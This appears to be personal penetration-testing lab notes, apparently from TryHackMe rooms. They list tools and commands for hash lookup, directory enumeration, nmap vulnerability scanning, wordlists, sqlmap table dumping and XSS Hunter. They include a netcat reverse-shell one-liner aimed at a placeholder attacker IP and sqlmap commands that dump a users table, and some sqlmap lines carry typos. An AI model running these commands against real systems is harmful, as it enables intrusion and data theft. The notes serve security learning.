Websites like CrackStation and Hashes.com internally use massive rainbow tables to provide fast password cracking for hashes without salts. Doing a lookup in a sorted list of hashes is quicker than trying to crack the hash.
To decode a string
echo -n 'c3RyaW5nLXRvLWJlLWRlY29kZWQ=' | base64 -d
cheat sheet: https://github.com/payload-box/command-injection-payload-list/blob/main/CHEAT_SHEET.md
online: https://gchq.github.io/CyberChef/ Local: https://github.com/gchq/CyberChef/releases
directory/file enumeration
gobuster dir -u {URL} -w directory-list-2.3-small.txt
example with Vunerabilities scanner + output in a file
nmap -sV -sC --script vuln -oN blue.map 10.80.148.21
(https://github.com/vulnersCom/nmap-vulners)
C:\Windows\System32\config - location where pass are stored
(https://codebeautify.org/javascript-obfuscator) (https://obf-io.deobfuscate.io/)
(https://tryhackme.com/room/hydra?taskNo=2&sharerId=69435a072b464127a6b6bfb7)
- dirbuster: https://github.com/brutalgg/dirbuster-wordlist?tab=readme-ov-file
- SecLists: https://github.com/danielmiessler/SecLists
- FuzzDB: https://github.com/fuzzdb-project/fuzzdb
- Seclists DNS: https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS
On local shells
nc -lvnp 443
On remote shells
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f
to see all options see
https://tryhackme.com/room/shellsoverview?taskNo=3&sharerId=69435a072b464127a6b6bfb7
work with querystring
- list all database
sqlmap -u http://sqlmaptesting.thm/search/cat=1 --dbs - list all tables from a database (ex users)
sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D users --tables - list all records from a database users from table thomas
qlmap -u http://sqlmaptesting.thmsearch/cat=1 -D users -T thomas --dump
https://tryhackme.com/room/vulnerabilityscanneroverview?taskNo=3&sharerId=69435a072b464127a6b6bfb7
How to install on a mac https://medium.com/@tanveer.ahmed1188/install-configure-openvas-on-a-macbook-macos-using-docker-desktop-step-by-step-guide-1396ae394f3e
XSS Hunter Express(https://github.com/mandatoryprogrammer/xsshunter-express)